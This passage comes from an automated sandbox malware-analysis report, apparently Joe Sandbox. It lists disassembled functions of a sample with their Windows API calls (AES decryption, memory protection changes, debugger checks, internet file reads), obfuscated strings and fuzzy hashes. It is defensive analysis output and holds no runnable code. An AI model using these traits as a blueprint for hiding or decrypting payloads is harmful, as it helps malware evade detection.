                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04943945
                      • GetLastError.KERNEL32 ref: 0494394F
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04943977
                      • GetLastError.KERNEL32 ref: 04943981
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04943991
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04943A53
                      • CryptDestroyKey.ADVAPI32(?), ref: 04943AC5
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04943893
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction ID: e28709bbd0167317d677ed61e52becdf7b2194bc70acfa8282d58d6545c7aa2a
                      • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction Fuzzy Hash: E6814071B002189FEF249F24CC45F9ABBB5EF89300F1481B9E94DA7291DB31AA858F55
                      Function 004035D0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,BBD3FB9F), ref: 00403650
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                      • GetLastError.KERNEL32 ref: 004036E8
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                      • GetLastError.KERNEL32 ref: 0040371A
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                      • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                      • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                      Function 00402A50 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                      • LocalFree.KERNEL32(00000000), ref: 00402B62
                      • LocalFree.KERNEL32(?), ref: 00402B67
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                      • String ID: %s: %s$Error protecting memory page
                      • API String ID: 839691724-1484484497
                      • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                      • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                      Function 005E2920 Relevance: 14.2, Strings: 10, Instructions: 1660COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: *!B9$,6D $1}o$3uL]$8?}w$OE=i$P:eb$T:wv$Y<}w$vR:m
                      • API String ID: 0-3713636289
                      • Opcode ID: 8cbc28ed8de87df63ace6162546383e27e074de4ccfa9dcb3954c13b02c506cb
                      • Instruction ID: 7ddfda5112d3122c76ed957839d0500e6aa471648f2b463047d5df0ab2e03d77
                      • Opcode Fuzzy Hash: 8cbc28ed8de87df63ace6162546383e27e074de4ccfa9dcb3954c13b02c506cb
                      • Instruction Fuzzy Hash: CCB228F3A082009FE304AE2DEC8567ABBE9EF94720F16493DEAC4D7744E93558058797
                      Function 005DD7E1 Relevance: 11.6, Strings: 8, Instructions: 1625COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: !!;_$2z9o$L>.k$[D~$g@s$j;s$ty7$,kz
                      • API String ID: 0-2819684213
                      • Opcode ID: e11fd2431256e82676e5be6e7533077cc1dd8ea359a4ec3c6f21440865ad7f19
                      • Instruction ID: 401927977823ab59119f4356e76d351182501e8fcb2b30f790cc70cb44e06456
                      • Opcode Fuzzy Hash: e11fd2431256e82676e5be6e7533077cc1dd8ea359a4ec3c6f21440865ad7f19
                      • Instruction Fuzzy Hash: D8B218F360C2009FE3046E2DEC8567AFBE5EF94720F1A4A3DEAC4C7744E63598458696
                      Function 0041A346 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                      • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                      • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                      Function 005E44B5 Relevance: 9.1, Strings: 6, Instructions: 1637COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: jh/$rRmf$u4M}${u~$.a$JP?
                      • API String ID: 0-4165264580
                      • Opcode ID: 0f180957aa9e1bd24fb475f1446e4ba66d662b948fc3832cfa9653c766499041
                      • Instruction ID: 25af535ebe7738b204bfcc4dd829a68d4f6f6c35c42b4e76d730a6a5333164a0
                      • Opcode Fuzzy Hash: 0f180957aa9e1bd24fb475f1446e4ba66d662b948fc3832cfa9653c766499041
                      • Instruction Fuzzy Hash: 99B24BF3A0C210AFE3046E2DEC8567ABBE9EFD4320F16463DEAC4D7744E97558018696
                      Function 005D3406 Relevance: 9.1, Strings: 6, Instructions: 1590COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: :;$EO_~$N*z~$bZ_$cMA$}t
                      • API String ID: 0-1237312033
                      • Opcode ID: 3af1170236a865c3d8e69ead3c0a8421f40a9a28eb407c9edda324ddeadca1ae
                      • Instruction ID: 4036bdfc4b3afedb513670a9aceacfc9061a317f12cad092c86ba730643e3944
                      • Opcode Fuzzy Hash: 3af1170236a865c3d8e69ead3c0a8421f40a9a28eb407c9edda324ddeadca1ae
                      • Instruction Fuzzy Hash: 92B2E4F39086009FE704AE29EC8567AFBE5EF94320F16893DEAC5C3744E63598058797
                      Function 00401970 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                      • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileInternet$PointerRead
                      • String ID: text
                      • API String ID: 3197321146-999008199
                      • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                      • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                      • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                      Function 005D83F1 Relevance: 7.9, Strings: 5, Instructions: 1698COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: @1m$Ga.$t{x${d_:$o!x
                      • API String ID: 0-206620874
                      • Opcode ID: c852ce34cbf66b7ef6b3d64234e1d1f9c2bed5f8170a5dfbe8dee22f6cde63fc
                      • Instruction ID: e26cd71369b4747b3d987c7ab686c049c32ced022980fa447a5a790683bf80fd
                      • Opcode Fuzzy Hash: c852ce34cbf66b7ef6b3d64234e1d1f9c2bed5f8170a5dfbe8dee22f6cde63fc
                      • Instruction Fuzzy Hash: 5EB217F3A082149FE3046E2DEC8567AFBE5EF94720F1A493DEAC4C3744EA7558018697
                      Function 04950BA7 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 819956c8da69d9361fbf4e47ff42106ad8a36c3f0c6e400b1e605b299af52eb5
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 3B022B71E012199FDB14CFA8C980BAEBBB5FF88314F248669D919EB350D731A945CB90
                      Function 00410940 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                      • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                      • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                      Function 0494A7F1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0494A7FD
                      • IsDebuggerPresent.KERNEL32 ref: 0494A8C9
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0494A8E9
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0494A8F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: 94c94a44b135ae989381e55fd8a71094e507e145c67eccc9764a277a8ef2010e
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: C1312975D4521CDBDB10DFA4D989BCDBBB8BF48304F1040AAE50DAB250EB71AA85CF44
                      Function 0040A58A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                      • IsDebuggerPresent.KERNEL32 ref: 0040A662
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                      • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                      • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                      Function 005D68A4 Relevance: 5.4, Strings: 3, Instructions: 1636COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 6c/~$P[4$zo
                      • API String ID: 0-2902303802
                      • Opcode ID: 75d36f11c497d9db264ac8b4c4aaf01d63c7bbf1fde5253cfe70d6d84021ad9e
                      • Instruction ID: 6e756c19e1edbf748455dfeacac8efaf4f0676359de3a18dc94ff4d51af373e1
                      • Opcode Fuzzy Hash: 75d36f11c497d9db264ac8b4c4aaf01d63c7bbf1fde5253cfe70d6d84021ad9e
                      • Instruction Fuzzy Hash: AFB2E5F360C204AFE3046E2DEC8567AF7E9EF94720F1A493DEAC5C3744EA3558058696
                      Function 0494D04A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04942AA0), ref: 0494D142
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04942AA0), ref: 0494D14C
                      • UnhandledExceptionFilter.KERNEL32(0494277A,?,?,?,?,?,04942AA0), ref: 0494D159
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction ID: 21efebb5599d5716e685dac3d0bd9a8c9b414818c4671e61e10afad7f7c4e334
                      • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                      • Instruction Fuzzy Hash: 9331A7759112289BCB61DF64DC89BDDBBB8BF48310F5041EAE81CA7260E770AF858F44
                      Function 0040CDE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                      • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                      • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                      Function 0494092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction ID: 25c07b4df250cc591a60015adfc3b3f30e6c5af78002851d15ca102c04993424
                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction Fuzzy Hash: D9316CB6910609DFEB10CF99C880AAEBBF9FF88328F14405AD541A7310D771FA45CBA4
                      Function 00410822 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,BBD3FB9F), ref: 00410837
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1518329722-0
                      • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
                      • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                      Function 00527ED4 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: -rR($?Onx
                      • API String ID: 0-1712884891
                      • Opcode ID: 25fcc91576eed7d14f1945048e1d0f5a3008f26bd8202700872679643a3ff551
                      • Instruction ID: 79846acbf4e7b5690a522b84a021a8d4fc9da77c85cc087af72a7ad17fe2a3d4
                      • Opcode Fuzzy Hash: 25fcc91576eed7d14f1945048e1d0f5a3008f26bd8202700872679643a3ff551
                      • Instruction Fuzzy Hash: 4B6127F3B182009BF3086E2DDC8577AB7D6EBC4320F1A463DDB8993784E93958018696
                      Function 005E1934 Relevance: 1.9, Strings: 1, Instructions: 668COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: rU
                      • API String ID: 0-3336436004
                      • Opcode ID: b3504efbe0036544ec1acf7a9b9e54a12e6685dbad243575ce347c27e668c359
                      • Instruction ID: 747fe20da9bc05e0f2843beb898598db8f6897cf113ff3cfcff745163d18f09a
                      • Opcode Fuzzy Hash: b3504efbe0036544ec1acf7a9b9e54a12e6685dbad243575ce347c27e668c359
                      • Instruction Fuzzy Hash: 841238F350C304AFE3086E29EC4567AFBE9EB94720F1A4A3DEAD5C3744EA3558018756
                      Function 04955995 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04955990,?,?,00000008,?,?,0495C8F1,00000000), ref: 04955BC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 6a92360c6ed593a8163160f57951f5ff22a9c40d74ee45768f7a554f177bb73f
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 71B11D31610608EFD715CF28C48AB657BE1FF45364F268668E899CF2B6D335E991CB40
                      Function 0041572E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                      Function 0040A2EC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                      Download Yara Rule
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                      • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                      Function 0495798E Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                      • Instruction ID: 80a742d2028110a4717a83176bcca929440e393f43cacecb4665b054b58c6b9a
                      • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                      • Instruction Fuzzy Hash: 21418775805219AFDF20DFA9CC88AEABBBDEF45304F2441E9E81DD3210D635AE458F60
                      Function 00417727 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                      • Instruction ID: 0da0f6d43ac66bea4d05f4cd5f3fcaee254ac53de518b98f89be5a9909b1102a
                      • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                      • Instruction Fuzzy Hash: 7B41B4B5C0421CAEDF20DF69CC89AEABBB8AF44304F1442DEE419D3241DA389E85CF54
                      Function 0494F170 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction ID: b5095156a5f690e3642485833f0ac53df0a1c405d01f16cdc1e8a54bfb3d9efb
                      • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction Fuzzy Hash: C1C10134A006478FDB28CF68C594E7ABBBAFFC5304F144A39D4529BA98D730B945CB60
                      Function 0040EF09 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
